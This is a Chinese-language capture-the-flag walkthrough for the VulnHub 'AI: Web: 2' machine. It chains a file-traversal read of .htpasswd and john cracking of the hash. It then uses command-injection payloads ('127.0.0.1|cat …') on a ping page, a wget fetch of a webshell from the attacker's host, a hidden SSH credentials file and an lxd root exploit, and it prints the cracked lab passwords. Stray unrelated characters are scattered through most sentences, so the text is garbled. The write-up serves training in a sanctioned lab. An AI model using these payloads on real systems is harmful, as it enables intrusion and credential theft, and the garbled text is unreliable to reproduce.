標(biāo)簽：文件讀取倔既、爆破、命令注入、敏感文件泄露瓢娜、lxd提權(quán)

0x00 環(huán)境準(zhǔn)備

下載地址：https://www.vulnhub.com/entry/ai-web-2,357/
flag數(shù)量：1
攻擊機：kali
攻擊機地址：192.168.5.3
靶機描述：

Difficulty: Intermediate
Network: DHCP (Automatically assign)
Network Mode: NAT
This is the second box from the series AI: Web and you will have more fun to crack this challenge. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root.

You may need to crack password. Use wordlist SecLists/rockyou-45.txt by Mr. Daniel Miessler.

For any hint please tweet on @arif_xpress

0x01信息搜集

1.探測靶機地址

命令：arp-scan -l

靶機地址是192.168.5.4

2.探測靶機開放端口

命令：nmap -sV -p- 192.168.5.4

開放了22端口和80端口，先看一下80端口

不是CMS礼预。嘗試sql注入眠砾，不存在sql注入。

3.目錄掃描

那就掃描一下目錄吧托酸，命令：dirb http://192.168.5.4

其中有個wenadmin的文件褒颈，訪問看一下

是個登錄頁面，嘗試幾個弱口令获高，不行哈肖。
那就看看其他功能吧。

0x02 文件讀取

看到有個注冊的按鈕念秧，那就先注冊一個賬戶試試淤井。

注冊后去登錄

登錄后是這個頁面，這里有個Welcome to XuezhuLi FileSharing標(biāo)語摊趾，去搜索引擎查一下xuezhuli filesharing

發(fā)現(xiàn)這是一個github上的項目币狠，2016年的項目，項目鏈接：https://github.com/XuezhuLi/FileSharing
查一下有沒有漏洞

找到了兩個漏洞砾层，第一個漏洞是CSRF漩绵，危害不大，也不好利用肛炮；第二個是文件遍歷止吐，這個可以讀取一些文件，用這個侨糟。漏洞利用鏈接：https://www.exploit-db.com/exploits/40009

使用burp抓包利用一下

利用成功碍扔，讀取到了/etc/passwd文件，剛才從插件上得知這是個apache的系統(tǒng)秕重，剛才還找到了登錄頁面不同，apache系統(tǒng)一般會有一個認(rèn)證文件，里面保存著賬號密碼溶耘。既然現(xiàn)在可以讀取文件二拐，那就讀取一下apache的認(rèn)證文件。

爆破出了apache的認(rèn)證文件凳兵，目錄：/etc/apache2/.htpasswd
賬號密碼：aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
賬號是aiweb2admin百新，密碼被加密了，使用john解密一下庐扫。

0x03 john爆破

提示中說用rockyou字典吟孙，將上面的賬號密碼保存一下澜倦，然后爆破。命令：john --wordlist=/usr/share/wordlists/rockyou.txt aiweb2.txt

爆破出來了杰妓，賬號密碼：aiweb2admin \ c.ronaldo

0x04 命令注入

在http://192.168.5.4/webadmin/下發(fā)現(xiàn)了robots.txt文件

訪問http://192.168.5.4/webadmin/H05Tpin9555/發(fā)現(xiàn)是一個執(zhí)行ping命令的頁面

使用burp抓包嘗試?yán)@過藻治，執(zhí)行其他命令。發(fā)現(xiàn)使用“|”可以繞過

嘗試反彈shell巷挥，但是不成功桩卵。
使用wget下載一句話試試，在kali上創(chuàng)建一句話文件倍宾，為了保險雏节，我既寫了一句話，又寫了反彈shell：

然后建立一個臨時服務(wù)器高职，命令：python -m SimpleHTTPServer

使用wget下載shell.php钩乍，命令：wget http://192.168.5.3:8000/shell.php

訪問一下看看，沒有報404怔锌，應(yīng)該是下載成功了寥粹，驗證一句話：

一句話可以執(zhí)行，連菜刀埃元，報錯了

我上網(wǎng)查了一下401錯誤：

如果這種通過瀏覽器的檢查表明沒有授權(quán)問題涝涤，則可能是您的 Web 服務(wù)器 ( 或周邊系統(tǒng) ) 被設(shè)置為不允許某種 HTTP 傳輸模式。 換句話說就是岛杀， 來自一個知名瀏覽器的 HTTP 通訊是允許的阔拳， 但來自其他系統(tǒng)的自動通訊則被拒絕， 并生成 401 錯誤代碼类嗤。這是一種異常情況糊肠， 但是也許表明您的 Web 服務(wù)器周圍 采取了非常具有防御性的安全策略。

這樣看來不能用菜刀這類的網(wǎng)站管理工具了遗锣，換個其他的思路吧货裹。
401錯誤解決方法：basic認(rèn)證

0x05 密碼文件——得來全不費工夫

既然不能使用一句話，那就看一下當(dāng)前目錄有什么文件吧
命令：ip=127.0.0.1|pwd&Submit=Submit
回顯：

/var/www/html/webadmin/H05Tpin9555

命令：ip=127.0.0.1|ls&Submit=Submit
回顯：

index.php
shell.php
style-main.css

沒什么可利用的黄伊，看看上一級webadmin目錄下有什么

命令：ip=127.0.0.1|ls /var/www/html/webadmin&Submit=Submit
回顯：

H05Tpin9555
S0mextras
index.html
robots.txt

訪問http://192.168.5.4/webadmin/S0mextras/看看

提示發(fā)現(xiàn)了juicy的信息，查看一下這個目錄下有什么文件

命令：ip=127.0.0.1|ls /var/www/html/webadmin/S0mextras&Submit=Submit
回顯：

index.htm

只有一個文件派殷，這跟提示不符啊还最，應(yīng)該是有隱藏文件

命令：ip=127.0.0.1|ls -la /var/www/html/webadmin/S0mextras&Submit=Submit
回顯：

/var/www/html/webadmin/S0mextras:
index.html

可能是無法使用-la參數(shù)，用find命令試一下

命令：ip=127.0.0.1|find . -type f /var/www/html/webadmin/S0mextras&Submit=Submit
回顯：

./style-main.css
./index.php
./shell.php
/var/www/html/webadmin/S0mextras
/var/www/html/webadmin/S0mextras/.sshUserCred55512.txt
/var/www/html/webadmin/S0mextras/index.html

這下發(fā)現(xiàn)了隱藏文件毡惜，.sshUserCred55512.txt文件從文件名上來看應(yīng)該是和ssh登錄有關(guān)拓轻，用cat命令查看一下。

命令：ip=127.0.0.1|cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt&Submit=Submit
回顯：

User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

0x06 提權(quán)

拿到了賬號密碼经伙，使用ssh登錄一下扶叉。命令：ssh n0nr00tuser@192.168.5.4

登錄成功
命令：sudo -l

不能使用sudo
那就使用LinEnum工具掃描一下可以利用哪些信息提權(quán)勿锅。
創(chuàng)建一個臨時服務(wù)器，然后靶機切換到/tmp目錄下枣氧，wget下載LinEnum.sh文件

然后給文件賦權(quán)溢十，執(zhí)行文件，由于輸出信息比較多达吞，這里使用-r參數(shù)指定將輸出信息輸出到report.txt文件中张弛。命令：./LinEnum.sh -r report.txt

在文件的最后發(fā)現(xiàn)可以利用lxd漏洞

找一下lxd的漏洞，命令：searchsploit lxd

把它復(fù)制過來

使用vi命令打開酪劫，然后輸入:set ff=unix吞鸭，然后輸入:wq回車保存退出。如果不設(shè)置ff=unix會報錯覆糟。

cat 46978.sh發(fā)現(xiàn)刻剥，運行腳本的時候還需要一個文件，文件地址https://github.com/saghul/lxd-alpine-builder
將文件下載到kali上滩字，然后給權(quán)限運行

運行后它會下載一個tar.gz的文件造虏，我下載用了很長時間，而且并不是一次就下載成功了踢械，我下載了三次才成功酗电，下載成功的截圖

下載成功后會出現(xiàn)一個tar.gz文件，這個文件是以時間戳命名的

在kali上創(chuàng)建臨時服務(wù)器内列，將需要用到的兩個文件下載到靶機上（由于kali換了新的鏡像撵术，現(xiàn)在的kali地址是192.168.5.9）

在靶機上切換到/tmp目錄，下載兩個文件

給46978.sh文件可執(zhí)行權(quán)限话瞧，然后運行

已經(jīng)是root權(quán)限了嫩与，flag.txt文件在/mnt/root/root下

0x07 小結(jié)

從文件讀取漏洞開始，讀取到apach的配置文件交排，拿到賬號密碼划滋，在進(jìn)入網(wǎng)站后臺后，又發(fā)現(xiàn)了命令注入漏洞埃篓，通過這個漏洞又找到了ssh的賬號密碼文件处坪，登錄ssh后開始提權(quán)。首先使用LinEnum.sh文件掃描漏洞架专，發(fā)現(xiàn)了lxd漏洞同窘。整體的難點或者說麻煩的地方在于運行build-alpine文件，這個地方浪費了很多時間部脚。

由于我不會每天都登錄簡書想邦，所以有什么私信或者評論我都不能及時回復(fù)，如果想要聯(lián)系我最好給我發(fā)郵件委刘，郵箱：Z2djMjUxMTBAMTYzLmNvbQ==丧没，如果發(fā)郵件請備注“簡書”

參考鏈接：

1.http 401錯誤解析
2.Basic認(rèn)證
3.AI: Web: 2靶機-Walkthrough
4.AI: WEB: 2 VULNHUB WALKTHROUGH